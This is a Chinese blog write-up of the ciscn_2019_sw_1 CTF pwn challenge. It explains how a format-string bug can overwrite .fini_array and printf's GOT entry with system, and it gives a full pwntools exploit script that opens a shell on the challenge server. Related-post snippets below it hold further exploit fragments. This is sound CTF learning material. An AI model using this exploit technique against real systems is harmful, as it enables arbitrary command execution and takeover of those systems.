ciscn_2019_sw_1 Writeup

原创 已于 2022-03-05 16:17:20 修改 · 593 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

于 2021-05-11 21:44:48 首次发布
本文介绍如何通过修改.fini_array指向main函数实现程序重启,并将printf.got替换为system_plt来执行任意命令,详细解析了攻击流程及所需地址。

前提

  • RELRO防御策略是当RELRO保护:
    • 为NO RELRO的时候,init.arrayfini.arraygot.plt均可读可写
    • 为PARTIAL RELRO的时候,ini.arrayfini.array可读不可写,got.plt可读可写
    • 为FULL RELRO时,init.arrayfini.arraygot.plt均可读不可写。
  • linux程序运行时:
    • 在加载的时候,会依次调用init.array数组中的每一个函数指针
    • 在结束的时候,依次调用fini.array中的每一个函数指针。
  • 当程序出现格式化字符串漏洞,但是至少需要写两次才能完成攻击。
    • 当少于两个输入点时,可以考虑改写fini.array中的函数指针为main函数地址,可以再执行一次main函数。
    • 一般来说,这个数组的长度为1,也就是说只能写一个地址。[1]

程序逻辑

  • 设置了数组存储上限char format[68];且输入限制为__isoc99_scanf("%64s", format);
    • 不存在越界输入。
    • 输入的字符串只有64个字符。
  • 存在输入字符串直接输出的情况printf(format);。可能存在格式化字符漏洞。
  • 存在函数_sys,返回了return system(command);

思路

  • .fini_array覆盖为main,使得程序结束后可以再次重新启用。
  • printf_got覆盖为system_plt,使得第二次使用本程序中,跳转到printf()这一步时等效于执行system()。输入的参数即为system()的参数。
  • 几个地址:
    • system().plt = 0x080483D0
    • fini_array = 0x0804979C
    • printf.got = 0x0804989C
    • main() = 0x08048534
from pwn import *
context.log_level = "debug"

io = remote("node3.buuoj.cn",28414)
elf = ELF("./sw_1_ciscn_2019")

fini_array = 0x0804979C
printf_got = 0x0804989C

payload = p32(fini_array+2) + p32(printf_got+2) 
payload += p32(printf_got) + p32(fini_array)
payload += "%"+str(0x0804-0x10)+"c" + "%4$hn"
payload += "%5$hn"
payload += "%"+str(0x83D0-0x0804)+"c" + "%6$hn"
payload += "%"+str(0x8534-0x83D0)+"c" + "%7$hn"


io.sendlineafter("Welcome to my ctf! What's your name?\n",payload)
io.sendlineafter("Welcome to my ctf! What's your name?\n","/bin/sh\x00")
io.interactive()

[1] 参考自 LynneHuan,ciscn_2019_sw_1 https://www.cnblogs.com/LynneHuan/p/14660529.html

Ch4mpa9ne
关注
BUUCTF之“ciscn_2019_sw_1
Probeginner的博客
12-26 1029
通过fmt改fini_array为main,更加深入理解程序执行
[BUUCTF-pwn]——ciscn_2019_sw_1
Y_peak的博客
04-03 672
[BUUCTF-pwn]——ciscn_2019_sw_1 一个简单的格式化字符串, 相信大家看到旁边 的system和格式化字符串漏洞,想的一定是利用格式化字符串漏洞将printf_got表修改system_plt表,然后使其循环调用main第二次输入’/bin/sh’就好 可能唯一需要说一下的就是, 程序结束时会调用_fini_array指向的函数指针,所以我们将其修改为mian就会循环调用了 算下偏移, 一看就是4 exploit from pwn import * p = remote("no
ciscn_2019_sw_1
doudoudedi
04-16 678
思路 通过格式化字符串是程序无限循环(__do_global_dtors_aux_fini_array_entry内存的地址写成main函数地址) 我们是通过libc_start_main调用main函数不管是在man函数调用前后都会调用fini函数的指针所以只要将其写坏即可然后将print_got表写成system即可拿到shell exp: from pwn import * #p=proce...
ciscn_2019_sw_1(fmt改fini_array无限循环)
wuyvle的博客
04-30 1937
很明显的格式化漏洞,但是printf只能用一次 我们可以修改fini_array 简单地说,在main函数前会调用.init段代码和.init_array段的函数数组中每一个函数指针。同样的,main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针。 而我们的目标就是修改.fini_array数组的第一个元素为start或者main函数地址。需要注意的是,这个数组的内容在再次从start开始执行后又会被修改,且程序可读取的字节数有限,因此需要一次性修改两个地址并且
ciscn_2019_en_2
m0sway的博客
03-25 1755
ciscn_2019_en_2 WriteUp BUU_PWN
buuoj ciscn_2019_n_1 writeup
m0_73605862的博客
05-30 198
Step4:查看函数,发现有一个gets()函数,栈的大小只有44,但是v1,点进去查看有0x30-0x4,又因为当v2=11.28125会有cat flag这个后门,所以只要让v1栈溢出可以使v2的值改变。Step3:看到main函数,查看伪代码(F5,如果键被占用,Fn+F5),然后发现有一个函数叫做func(),进入这个函数。【来源】(buuoj)https://buuoj.cn/challenges#ciscn_2019_n_1。【题目】ciscn_2019_n_1
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 804
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 751
Buu CTF PWNciscn_2019_c_1WriteUp
【逆向学习记录】Tcachebin CISCN_2019_PWN17 Write up
卦星的专栏
09-01 1107
1 概述 这几天做了一个libc2.27的题目,了解到tcachebin的基础内容,发现利用这个tcachebin,反而导致漏洞更好利用了 2 tchchebin 3 CTF题目 题目1CISCN2019_pwn6 参考:pwn6_exp 题目2:CISCN2019_pwn17 4 解题思路 4.1 题目解析 1,输入内容,基本上没有任何内容提示 2、反编译查看 1、存在一个check,绕过这...
Ciscn_2019_sw1<fini_array>
m0_55906008的博客
09-22 264
​ 在执行main函数之前会调用init_array里的函数,在执行完main函数之后调用fini_array里的函数,因此这道题思路为通过第一次printf劫持printf的got表为system的函数地址,劫持fini_addr为main函数的地址,第二次输入"/bin/sh\x00",当执行到printf(“/bin/sh\x00”)时,由于劫持为system函数,因此执行system(“/bin/sh\x00”),拿到shell。
ciscn_2019_sw_1(fmt劫持fini_array为main,获得一次循环)
m0_51251108的博客
11-13 740
ciscn_2019_sw_1: 主要参考这位师傅:https://www.cnblogs.com/LynneHuan/p/14660529.html#%E7%9F%A5%E8%AF%86%E7%82%B9 先引用下: 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写; 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写; 为FULL RELRO时,init.array
ciscn_2019_s_1
doudoudedi
06-29 859
思路 通过off by null写key值然后unlink写bss段再次double free写free_hook即可拿到shell exp: from pwn import * #p=process('./ciscn_s_1') p=remote('node3.buuoj.cn',26429) elf=ELF('./ciscn_s_1') libc=elf.libc def add(idx,size,data): p.sendlineafter('show','1') p.sendlineafte
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN
Welcome To Myon'Blog !
05-27 2387
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN) Misc 1、被加密的生产流量 Crypto 2、Sign_in_passwd Web 3、unzip 4、dumpit Re 5、babyRE Pwn 6、funcanary
ciscn的简介
weixin_33840661的博客
03-31 1482
www.ciscn.cn 全国大学生信息安全竞赛官网教育部按照《教育部关于进一步加强信息安全学科、专业建设和人才培养工作的意见》(教高〔2005〕7号)的要求及《教育部关于成立2006-2010年教育部高等学校有关科类教学指导委员会的通知》(教高函〔2005〕25号)的有关工作安排,为加强教育部对高等学校信息安全人才培养工作的宏观指导与管理,充分发挥专家学者对信息安全...
ciscn login
m0_64195960的博客
03-20 1070
这是去年国赛一道签到题 当时没做出来 现在来复现一下。
2017ciscn
Xi4or0uji
08-04 1469
misc warmup 这题是盲水印加密,拿到一个加密的压缩包和一张png图片,png加密成zip包,然后明文攻击原来的压缩包(时间贼久,等了一个晚上才把压缩包解密了.......... 看到两张差不多的图 丢去stegsolve XOR一下可以看见一堆横纹,然后应该就是盲水印了 最后就是放去解密 python bwm.py encode fuli.png fuli2.png re...
2024CISCN 全国大学生信息安全竞赛创新实践赛MISC部分WP
最新发布
weixin_62467741的博客
05-22 1821
最开始得到的是一个内存文件dmp和一个exe,猜测dmp对应的是找浏览器记录,exe对应的是c2地址,exe在虚拟机里运行一下得到的是一个.ss文件夹里面有loader.exe和一个png,png最上面有数据块,直接stegsolve过滤r全通道,savebin,得到类似于zip的文件。在ppt/embeddings文件夹下的docx中,从PPT打开的话就是第二章左上角那块黑色的,双击就行,打开后全选,改字体大小,改颜色,凯撒偏移量10解密,然后base64解密,得到part2。然后base64解码。
全国大学生信息安全竞赛(CISCN)-reverse-复现(部分)
ookami6497的博客
06-06 1260
CISCN
高级数据结构实验报告:ADS Writeup_2解析
1. 高级数据结构概念:高级数据结构(Advanced Data Structures, ADS)是在基础数据结构如数组和链表之上,为了满足特定需求而设计的复杂数据组织方式。这些数据结构通常具有较高的性能优势,比如更快的搜索速度、插入...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值